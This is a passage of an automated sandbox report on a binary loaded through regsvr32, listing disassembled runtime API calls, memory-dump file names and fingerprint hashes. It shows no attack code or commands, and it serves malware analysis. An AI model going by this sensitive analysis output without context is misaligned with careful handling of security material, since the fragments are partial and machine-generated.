                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFF21BBE3B5
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFF21BBE3F0
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFF21BBE42C
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFF21BBE46C
                                                                    • free.LIBCMT ref: 00007FFF21BBE47A
                                                                    • free.LIBCMT ref: 00007FFF21BBE49C
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$Infofree
                                                                    • String ID:
                                                                    • API String ID: 1638741495-0
                                                                    • Opcode ID: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                    • Instruction ID: 69bac9f08dd908a5e223d274bb1ad8ec3b92db1afb26a315db96bc146885e380
                                                                    • Opcode Fuzzy Hash: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                    • Instruction Fuzzy Hash: EE61B436E096818AE7348B219C9016DA6F5FF84BA8F646A35DE1D87FF4DF3CD6418204
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                    • String ID:
                                                                    • API String ID: 2551688548-0
                                                                    • Opcode ID: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                    • Instruction ID: e41a51c56fc99a5c492d71ff887704b20468cc4d1a04efb62211f7defe6c385b
                                                                    • Opcode Fuzzy Hash: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                    • Instruction Fuzzy Hash: DF414A21E0E64285EB609B15EC6017E62F5BB88B84F442135EE4E87BB5DE3CE6558708
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFF21BB9206), ref: 00007FFF21BB8F94
                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFF21BB9206), ref: 00007FFF21BB8FA6
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFF21BB9206), ref: 00007FFF21BB9006
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFF21BB9206), ref: 00007FFF21BB90BC
                                                                    • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFF21BB9206), ref: 00007FFF21BB90D3
                                                                    • free.LIBCMT ref: 00007FFF21BB90E4
                                                                    • GetStringTypeA.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFF21BB9206), ref: 00007FFF21BB9161
                                                                    • free.LIBCMT ref: 00007FFF21BB9171
                                                                      • Part of subcall function 00007FFF21BBE23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFF21BBE292
                                                                      • Part of subcall function 00007FFF21BBE23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFF21BBE2B1
                                                                      • Part of subcall function 00007FFF21BBE23C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFF21BBE3B5
                                                                      • Part of subcall function 00007FFF21BBE23C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFF21BBE3F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3535580693-0
                                                                    • Opcode ID: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                    • Instruction ID: 79b1646b7fc17adcc1454ade5135998a4ab135790fe440c79bcef4a023dc8fcf
                                                                    • Opcode Fuzzy Hash: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                    • Instruction Fuzzy Hash: A5618172E046829AEB309F21DC5446D67F2FB48BE4B542635DE1D97FA4CE3CEA418344
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetStartupInfoA.KERNEL32 ref: 00007FFF21BB377D
                                                                      • Part of subcall function 00007FFF21BB3108: Sleep.KERNEL32(?,?,0000000A,00007FFF21BB2DA3,?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB314D
                                                                    • GetFileType.KERNEL32 ref: 00007FFF21BB38FA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: FileInfoSleepStartupType
                                                                    • String ID: @
                                                                    • API String ID: 1527402494-2766056989
                                                                    • Opcode ID: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                    • Instruction ID: 05add1aff70289e91d553e454e1b5bf90471ee227e8a9e3d420dd5637cb2b669
                                                                    • Opcode Fuzzy Hash: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                    • Instruction Fuzzy Hash: 8891A122E1868285E7208B28CC5422D2AF9FB05774F656735CABE82BF0DF7CE941C315
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$_getptd
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 3432092939-699404926
                                                                    • Opcode ID: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                    • Instruction ID: cb47d1e7b1a66cd012005700a694cb3682c0ab7c9a5fd9ae0f4f28c0d7420b3c
                                                                    • Opcode Fuzzy Hash: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                    • Instruction Fuzzy Hash: 9771D022D1C68281FBB64626CC2537E26F1BF44754F1561B6EE5A82AF0DF6CFA408309
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _FF_MSGBANNER.LIBCMT ref: 00007FFF21BB6ADF
                                                                      • Part of subcall function 00007FFF21BB6F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFF21BB7194,?,?,?,?,00007FFF21BB6C69,?,?,00000000,00007FFF21BB30C0), ref: 00007FFF21BB6FCF
                                                                      • Part of subcall function 00007FFF21BB334C: ExitProcess.KERNEL32 ref: 00007FFF21BB335B
                                                                      • Part of subcall function 00007FFF21BB309C: Sleep.KERNEL32(?,?,00000000,00007FFF21BB6B19,?,?,00000000,00007FFF21BB6BC3,?,?,?,?,?,?,00000000,00007FFF21BB2DC8), ref: 00007FFF21BB30D2
                                                                    • _errno.LIBCMT ref: 00007FFF21BB6B21
                                                                    • _lock.LIBCMT ref: 00007FFF21BB6B35
                                                                    • free.LIBCMT ref: 00007FFF21BB6B57
                                                                    • _errno.LIBCMT ref: 00007FFF21BB6B5C
                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FFF21BB6BC3,?,?,?,?,?,?,00000000,00007FFF21BB2DC8,?,?,?,00007FFF21BB2DFF), ref: 00007FFF21BB6B82
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfree
                                                                    • String ID:
                                                                    • API String ID: 1354249094-0
                                                                    • Opcode ID: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                    • Instruction ID: a144e48e21daadbce5e997aa7d4837adad98e8f9eb3669beee17728960089a16
                                                                    • Opcode Fuzzy Hash: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                    • Instruction Fuzzy Hash: E0215E20E1960286F774AB219C6537E62F4FF84780F446131ED4EC6AE2CF3CE9408798
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB2D7A
                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB2D88
                                                                    • SetLastError.KERNEL32(?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB2DE0
                                                                      • Part of subcall function 00007FFF21BB3108: Sleep.KERNEL32(?,?,0000000A,00007FFF21BB2DA3,?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB314D
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB2DB4
                                                                    • free.LIBCMT ref: 00007FFF21BB2DD7
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00007FFF21BB2DC8
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                    • String ID:
                                                                    • API String ID: 3106088686-0
                                                                    • Opcode ID: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                    • Instruction ID: d1c06e076111dcbf6d989850515072b952868cbf1a5fa36eddf1b9b22407b10b
                                                                    • Opcode Fuzzy Hash: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                    • Instruction Fuzzy Hash: ED017524E0AB428AFB245B659C5413C22F3BF4CB90B446274CD2D827F1DE3CF545C218
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 1012874770-0
                                                                    • Opcode ID: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                    • Instruction ID: 79cdcd09c2f5a41b7c74e888ebd66730569efcd93aa59e8e94d0c02478f6c32d
                                                                    • Opcode Fuzzy Hash: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                    • Instruction Fuzzy Hash: C301E852E0980295EF75DB61DCB147D23F1BF88B00F443032DA0EC69B2CE6DF9858268
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                    • Instruction ID: 0f881b23e490a3c96f368de2173cd4114a21fbc433a63b5b9f8538936a3bf52f
                                                                    • Opcode Fuzzy Hash: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                    • Instruction Fuzzy Hash: B8B14E32F18B4185EB60DB62E8516AE67E0FB89784F406531EE8D83FA5DF3CD2058744
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$Sleep_errno
                                                                    • String ID:
                                                                    • API String ID: 2081351063-0
                                                                    • Opcode ID: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                    • Instruction ID: fdb499924a3b3e81de8e2ca6e78eed89d8c3091dd01a2d2850ab9e62adb7ed23
                                                                    • Opcode Fuzzy Hash: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                    • Instruction Fuzzy Hash: C5311E21E0964285EB659B22CC7127D66F1BF44FC4F44A035DE0D87BB6DE3CEA018388
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DecodePointer.KERNEL32(?,?,?,00007FFF21BB73E5,?,?,?,?,00007FFF21BB34D2,?,?,?,00007FFF21BB21CB), ref: 00007FFF21BB72FD
                                                                    • DecodePointer.KERNEL32(?,?,?,00007FFF21BB73E5,?,?,?,?,00007FFF21BB34D2,?,?,?,00007FFF21BB21CB), ref: 00007FFF21BB730C
                                                                    • EncodePointer.KERNEL32(?,?,?,00007FFF21BB73E5,?,?,?,?,00007FFF21BB34D2,?,?,?,00007FFF21BB21CB), ref: 00007FFF21BB7389
                                                                      • Part of subcall function 00007FFF21BB318C: realloc.LIBCMT ref: 00007FFF21BB31B7
                                                                      • Part of subcall function 00007FFF21BB318C: Sleep.KERNEL32(?,?,00000000,00007FFF21BB7379,?,?,?,00007FFF21BB73E5,?,?,?,?,00007FFF21BB34D2), ref: 00007FFF21BB31D3
                                                                    • EncodePointer.KERNEL32(?,?,?,00007FFF21BB73E5,?,?,?,?,00007FFF21BB34D2,?,?,?,00007FFF21BB21CB), ref: 00007FFF21BB7398
                                                                    • EncodePointer.KERNEL32(?,?,?,00007FFF21BB73E5,?,?,?,?,00007FFF21BB34D2,?,?,?,00007FFF21BB21CB), ref: 00007FFF21BB73A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                    • String ID:
                                                                    • API String ID: 1310268301-0
                                                                    • Opcode ID: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                    • Instruction ID: fe67fc2485bdd2326a3df0b70384b185628db72535f94a71777611c72e710425
                                                                    • Opcode Fuzzy Hash: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                    • Instruction Fuzzy Hash: 69214111F0A64255EF209B61EDA60BEA2F1BB45BC0F446835DD0D87FB5DE7CE6868308
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                    • String ID:
                                                                    • API String ID: 1310268301-0
                                                                    • Opcode ID: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                    • Instruction ID: bc5a55926578d8887da5e3c9ff6e488a8947eb2903448dfa633dea355672ee68
                                                                    • Opcode Fuzzy Hash: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                    • Instruction Fuzzy Hash: 63219010F0A68244EF20EB51E96517DA2F1BB457C0F482435ED4D87FB5DE3CE6458308
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$__initmbctable
                                                                    • String ID: @CW
                                                                    • API String ID: 2804101511-2709556291
                                                                    • Opcode ID: 62b67f3d166044e4c3a65fa2a8f4440ca774743433b5403a5dc793ed1f544cce
                                                                    • Instruction ID: e3c1dacf055b1e3defac24d3f7b7717544473b72972a8de24399a6404672ecf3
                                                                    • Opcode Fuzzy Hash: 62b67f3d166044e4c3a65fa2a8f4440ca774743433b5403a5dc793ed1f544cce
                                                                    • Instruction Fuzzy Hash: EF315E21E0964249FB709B21AC6137E66F0BF55B80F586535DE4CC6ABADF3CE5448308
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FFF21BB3359,?,?,00000028,00007FFF21BB6C7D,?,?,00000000,00007FFF21BB30C0,?,?,00000000,00007FFF21BB6B19), ref: 00007FFF21BB331F
                                                                    • GetProcAddress.KERNEL32(?,?,000000FF,00007FFF21BB3359,?,?,00000028,00007FFF21BB6C7D,?,?,00000000,00007FFF21BB30C0,?,?,00000000,00007FFF21BB6B19), ref: 00007FFF21BB3334
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 1646373207-1276376045
                                                                    • Opcode ID: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                    • Instruction ID: 243b4f12e4b252912d6201ec7de211cb9902198b5a432bdb0bc25b5770a963dc
                                                                    • Opcode Fuzzy Hash: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                    • Instruction Fuzzy Hash: 5AE0EC50F1B60245EF595B50ACD413D12F16F98F11B487479C85F863B0DE6CA698C218
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00007FFF21BB309C: Sleep.KERNEL32(?,?,00000000,00007FFF21BB6B19,?,?,00000000,00007FFF21BB6BC3,?,?,?,?,?,?,00000000,00007FFF21BB2DC8), ref: 00007FFF21BB30D2
                                                                    • free.LIBCMT ref: 00007FFF21BB58A5
                                                                    • free.LIBCMT ref: 00007FFF21BB58C1
                                                                      • Part of subcall function 00007FFF21BB6550: RtlCaptureContext.KERNEL32 ref: 00007FFF21BB658F
                                                                      • Part of subcall function 00007FFF21BB6550: IsDebuggerPresent.KERNEL32 ref: 00007FFF21BB662D
                                                                      • Part of subcall function 00007FFF21BB6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFF21BB6637
                                                                      • Part of subcall function 00007FFF21BB6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFF21BB6642
                                                                      • Part of subcall function 00007FFF21BB6550: GetCurrentProcess.KERNEL32 ref: 00007FFF21BB6658
                                                                      • Part of subcall function 00007FFF21BB6550: TerminateProcess.KERNEL32 ref: 00007FFF21BB6666
                                                                    • free.LIBCMT ref: 00007FFF21BB58D6
                                                                      • Part of subcall function 00007FFF21BB3024: HeapFree.KERNEL32(?,?,00000000,00007FFF21BB2DDC,?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB303A
                                                                      • Part of subcall function 00007FFF21BB3024: _errno.LIBCMT ref: 00007FFF21BB3044
                                                                      • Part of subcall function 00007FFF21BB3024: GetLastError.KERNEL32(?,?,00000000,00007FFF21BB2DDC,?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB304C
                                                                    • free.LIBCMT ref: 00007FFF21BB58F5
                                                                    • free.LIBCMT ref: 00007FFF21BB5911
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
